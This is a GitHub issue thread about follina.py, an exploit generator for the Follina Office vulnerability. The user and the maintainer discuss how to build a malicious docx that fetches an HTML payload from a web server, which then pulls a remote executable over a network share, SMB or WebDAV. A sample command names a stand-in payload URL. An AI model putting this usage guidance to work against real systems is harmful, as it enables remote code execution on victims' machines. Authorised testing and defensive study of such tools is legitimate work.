chvancooten/follina.py

Using a remote binary

GTP95 opened this issue · 2 comments

GTP95 commented

Hello,

I'm trying to test the remote version of the exploit in a more realistic setting, i.e. I'm actually uploading an executable to a web server and trying to specify the URL with the -u switch. But I get an error that says that I have to specify the executable:

$ python follina.py -t docx -m binary -u https://www.example.com/my_payload.exe
Binary mode requires a binary to be specified, e.g. -b '\\localhost\c$\Windows\System32\calc.exe'

My understanding is that by supplying a URL the script should generate an exploit that tries to retrieve the executable from the web server instead of searching locally. Am I getting this wrong?

Hi @GTP95! The -u flag denotes where the document will try to retrieve the generated (HTML) payload from; it cannot be used to reference a binary directly. The -b flag is used to define where the generated HTML payload will retrieve the binary payload from, which is the flag that you are looking for. You can define a network share there for remote payload retrieval.

As an example, if you are hosting the generated payload.html on a web server with domain, you could specify the -u flag to be https://www.yourdomain.com/payload. You can then use the -b flag to point to the binary on a network file share. Potentially you could use a public SMB server or WebDAV, but this is untested.

Hope this clarifies things!

GTP95 commented

Yes, I think I got it now. Thank you!